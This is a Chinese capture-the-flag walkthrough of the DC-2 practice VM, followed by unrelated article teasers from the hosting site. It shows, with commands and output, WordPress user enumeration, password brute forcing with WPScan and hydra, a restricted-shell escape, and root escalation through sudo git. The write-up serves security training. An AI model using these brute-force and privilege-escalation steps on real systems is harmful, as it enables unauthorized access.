【DC渗透系列】DC-2靶场

arp先扫

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
192.168.100.23  00:0c:29:64:16:07       VMware, Inc.
192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

nmap扫

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -n -p- 192.168.100.23
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
Nmap scan report for 192.168.100.23
Host is up (0.0014s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Did not follow redirect to http://dc-2/
|_http-server-header: Apache/2.4.10 (Debian)
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:64:16:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms 192.168.100.23

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

开了80的http端口和7744的ssh的端口
尝试浏览器访问

Hmm. We’re having trouble finding that site.

We can’t connect to the server at dc-2.

If that address is correct, here are three other things you can try:

    Try again later.
    Check your network connection.
    If you are connected but behind a firewall, check that Firefox has permission to access the Web.

url跳到http://dc-2/

修改hosts文件

/etc/hosts(linux系统)
C:\Windows\System32\drivers\etc\hosts(Windows系统)
在这里插入图片描述
就好啦
在这里插入图片描述

找到flag1

在这里插入图片描述
发现是一个wordpress搭建的网站
在这里插入图片描述
flag中提示说要登录,找不到flag2就换个号登

dirsearch扫一下登陆界面

在这里插入图片描述
找到http://dc-2/wp-admin/
在这里插入图片描述
访问成功
开始爆破
kali密码攻击工具——Cewl使用指南

┌──(root㉿kali)-[~/Desktop]
└─# cewl http://dc-2/ -w /root/Desktop/dict.txt
CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

在这里插入图片描述
专门针对WordPress的工具WPScan

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.24
                               
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] Updating the Database ...
[i] Update completed.

[+] URL: http://dc-2/ [192.168.100.23]
[+] Started: Thu Feb  1 20:12:07 2024

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
 |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2024-01-16T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 3.5
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Thu Feb  1 20:12:10 2024
[+] Requests Done: 74
[+] Cached Requests: 6
[+] Data Sent: 16.619 KB
[+] Data Received: 21.289 MB
[+] Memory used: 177.188 MB
[+] Elapsed time: 00:00:03

扫出三个用户名,放入user.txt

┌──(root㉿kali)-[~/Desktop]
└─# vim user.txt  
                                                                                                                                                 
┌──(root㉿kali)-[~/Desktop]
└─# cat user.txt                               
admin
jerry
tom

开始爆破

┌──(root㉿kali)-[~/Desktop]
└─# wpscan --url dc-2 -U '/root/Desktop/user.txt'  -P '/root/Desktop/dict.txt' 

在这里插入图片描述

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

jerry登录page里面找到flag2

在这里插入图片描述
提示我们;另一条路,账号名密码都有,想到前面的7744ssh端口爆破

同DC-9解法,海德拉

┌──(root㉿kali)-[~/Desktop]
└─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744 
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
[DATA] attacking ssh://192.168.100.23:7744/
[STATUS] 146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
[STATUS] 105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
[7744][ssh] host: 192.168.100.23   login: tom   password: parturient
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40

在这里插入图片描述

ssh尝试连接

ssh登录
使用less和vi可以查看

┌──(root㉿kali)-[~]
└─# ssh tom@192.168.100.23 -p 7744 
The authenticity of host '[192.168.100.23]:7744 ([192.168.100.23]:7744)' can't be established.
ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.100.23]:7744' (ED25519) to the list of known hosts.
tom@192.168.100.23's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
tom@DC-2:~$ ls
flag3.txt  usr
tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found
tom@DC-2:~$ more flag3.txt
-rbash: more: command not found
tom@DC-2:~$ 
tom@DC-2:~$ less flag3.txt

在这里插入图片描述
受限制shell(rbash–>相当于你的权限很低,很多命令用不了)的原因,命令type,cat,more,vim都无法查看

绕过rbash

法一:使用vi编辑进行绕过
(1)vi 文件名 //文件名自取
(2)输入:set shell=/bin/sh,然后回车
(3)输入:shell
(4)设置环境变量:export PATH=/usr/sbin:/usr/bin:/sbin:/bin
法二:BASH_CMDS设置shell

BASH_CMDS[x]=/bin/bash   #设置了个x变量shell 
x    #相当于执行shell
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin/

在这里插入图片描述
在这里插入图片描述
应该与jerrry有关,转到jerry目录,发现flag4

tom@DC-2:~$ ls
123  denglu  flag3.txt  tom  usr
tom@DC-2:~$ pwd
/home/tom
tom@DC-2:~$ cd ..
tom@DC-2:/home$ ls
jerry  tom
tom@DC-2:/home$ cd jerry
tom@DC-2:/home/jerry$ ls
flag4.txt
tom@DC-2:/home/jerry$ 

在这里插入图片描述
还是提示git提权了

git提权

先转到jerry,密码前面找过了
在这里插入图片描述

法一:

sudo -l  //查询可用sudo命令

果然有git

tom@DC-2:/home/jerry$ su jerry
Password: 
jerry@DC-2:~$ 
jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git
jerry@DC-2:~$ 

sudo git help config //强制进入交互状态
!/bin/bash  (这里bash也可以换成sh) //打开一个root权限下的shell
jerry@DC-2:~$ sudo git help config //强制进入交互状态
root@DC-2:/home/jerry# 

法二:

sudo git -p help
!/bin/bash  (这里bash也可以换成sh)

flag在root目录下

在这里插入图片描述
结束!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:/a/370716.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

Macbook 安装金铲铲之战等 IOS 游戏

前言 Macbook 现在可以玩一下 IOS 系统上的游戏啦&#xff0c;以笔者的 M1 Pro 芯片为例 步骤 一、安装 PlayCover 推荐 Sonama 安装 Nightly 版本 官网地址&#xff1a; https://playcover.io/ Nightly: https://nightly.link/playcover/playcover/workflows/2.nightly_re…

SQL 函数(十二)

SQL 函数&#xff08;十二&#xff09; 一、函数分类 1.1 单行函数 单行函数仅对单个行进行运算&#xff0c;并且每行返回一个结果。 常见的函数类型&#xff1a; 字符、数字、日期、转换 1.2 多行函数 多行函数能够操纵成组的行&#xff0c;每个行组给出一个结果&#x…

通过 editplus 批量转换文本编码

有时候需要对文本的编码进行批量转换&#xff0c;文本编辑器 notepad 中的“编码”菜单可以用来转换单个的文档编码&#xff0c;当文档数量多的时候&#xff0c;一个个操作比较繁琐&#xff0c;通过文本编辑器 editplus 软件&#xff0c;可以方便快速地批量修改文本文件的编码&…

帕鲁存档跨云迁服教程

近期一款名为幻兽帕鲁的游戏爆火&#xff0c;以迅雷不及掩耳之势拳打csgo&#xff0c;脚踢dota2&#xff0c;登顶steam同时在线第一名。 由于其独特的个人服务器机制&#xff0c;各大云厂商纷纷响应&#xff0c;腾讯云原价330的4核16G的轻量应用服务器新用户现在最低只要66元一…

GLIP:零样本学习 + 目标检测 + 视觉语言大模型

GLIP 核心思想GLIP 对比 BLIP、BLIP-2、CLIP 主要问题: 如何构建一个能够在不同任务和领域中以零样本或少样本方式无缝迁移的预训练模型&#xff1f;统一的短语定位损失语言意识的深度融合预训练数据类型的结合语义丰富数据的扩展零样本和少样本迁移学习 效果 论文&#xff1a;…

SSL证书的验证过程

HTTPS是工作于SSL层之上的HTTP协议&#xff0c;SSL&#xff08;安全套接层&#xff09;工作于TCP层之上&#xff0c;向应用层提供了两个基本安全服务&#xff1a;认证和保密。SSL有三个子协议&#xff1a;握手协议&#xff0c;记录协议和警报协议。其中握手协议实现服务器与客户…

问题:根据全面推进国防和军队现代化的战略安排,_____把人民军队全面建成世界一流军队。 #经验分享#媒体

问题&#xff1a;根据全面推进国防和军队现代化的战略安排&#xff0c;_____把人民军队全面建成世界一流军队。 A、2020年 B、2035年 C、本世纪中叶 D、2045年 参考答案如图所示 问题&#xff1a;判断题&#xff1a;高处作业传递物件应使用绳索&#xff0c;在确认作业下方…

Qt QGraphicsScene 基于视频的绘图

需求&#xff1a; 基于视频进行 图形的绘制。 方案&#xff1a; 上一篇文章分享了如何将视频实时渲染到QGraphicsScene 系统里&#xff0c;并简单讲述了如何进行绘图&#xff0c;但在实际使用时还是发现了一些技巧&#xff0c;现在总结一下。 Qt 基于海康相机 的视频标绘-CSD…

人类的本性,逃不开党同伐异

近几年以来&#xff0c;不知道大家有没有感受到&#xff0c;网络上越来越充满戾气。 无论哪个网站&#xff0c;只要打开评论区&#xff0c;充斥在眼前的总是一片乌烟瘴气。 一言不合就「对线」&#xff0c;动不动一顶帽子扣过去&#xff0c;说话前先「站队」「找友军」&#xf…

博途PLC限幅器(SCL代码)

PLC限幅器详细介绍,可以参考下面文章: https://rxxw-control.blog.csdn.net/article/details/128701050https://rxxw-control.blog.csdn.net/article/details/128701050三菱PLC限幅器 https://rxxw-control.blog.csdn.net/article/details/135212965

C++入门的基础

幸福比傲慢更容易蒙住人的眼睛。 ——大仲马 C入门 1、属于C的关键字1、1、C从何而来1、2、C关键字(C98) 2、命名空间2、1、命名空间的定义2、2、命名空间使用 3、C输入和输出4、缺省参数4、1、缺省参数概念4、2、缺省参数分类 5、函数重载5、1、函数重载概念 6、引用6、1、引用…

PHP框架详解 - symfony框架

首先说一下为什么要写symfony框架&#xff0c;这个框架也属于PHP的一个框架&#xff0c;小编接触也是3年前&#xff0c;原因是小编接触Golang&#xff0c;发现symfony框架有PHP框架的东西也有Golang的东西&#xff0c;所以决定总结一下&#xff0c;有需要的同学可以参看小编的G…

yolov1到v8的变化

目录 1.YOLO介绍&#xff1a;1.变化&#xff1a;小结&#xff1a; 1.YOLO介绍&#xff1a; YOLO&#xff08;You Only Look Once&#xff09;是一种流行的目标检测算法&#xff0c;它的版本从YOLOv1到YOLOv8经历了多次改进。以下是YOLOv1到YOLOv8的一些不同之处和改变&#xf…

快来使用Portainer让测试环境搭建飞起来吧

Portainer是Docker的图形化管理工具&#xff0c;提供状态显示面板、应用模板快速部署、容器镜像网络数据卷的基本操作&#xff08;包括上传下载镜像&#xff0c;创建容器等操作&#xff09;、事件日志显示、容器控制台操作、Swarm集群和服务等集中管理和操作、登录用户管理和控…

PM圆桌派:同事不愿意告诉你的职场套路有哪些?

职场是社会的缩影&#xff0c;想要崭露头角&#xff0c;获得更多升职加薪的机会&#xff0c;就不要做着和多数人一样的事情&#xff0c;却期待着不一样的结果。 职场上有很多潜在的规则&#xff0c;要会做事&#xff0c;也要会说话&#xff0c;更要会做人。如果不懂规则&#…

Python 数据可视化:配色方案

1、引言 在这篇文章中&#xff0c;我们将研究Python的一些配色方案&#xff0c;主要是Seaborn库。这将采用 Python Notebook 格式&#xff0c;其中包括绘图的代码。 2、实验数据 首先导入必要的库&#xff1a; import pandas as pd import seaborn as sns import matplotlib…

【Vue】3-2、组合式 API

一、setup 选项 <script> export default {/*** 1、setup 执行时机早于 beforeCreate* 2、setup 中无法获取 this* 3、数据和函数需要在 setup 最后 return&#xff0c;才能在模板中使用* 4、可以通过 setup 语法糖简化代码*/setup(){// console.log(setup function, thi…

Flink容错机制

目录 一&#xff0c;检查点&#xff1a; 二&#xff0c;保存点&#xff1a; ①版本管理和归档存储&#xff1a; ②更新Flink版本&#xff1a; ③更新应用程序&#xff1a; ④调整并行度&#xff1a; ⑤暂停应用程序&#xff1a; Flink容错机制 一&#xff0c;检查点&#xff…

RedHat8.4安装邮件服务器

一、配置发件服务器 1.1 根据现场IP&#xff0c;配置主机名 vim /etc/hosts 192.168.8.120 mail.test.com 将主机名更改为邮件服务器域名mail.test.com 1.2 关闭防火墙&#xff0c;禁止开机启动 systemctl stop firewalld systemctl disable firewalld 1.3 关闭selinux v…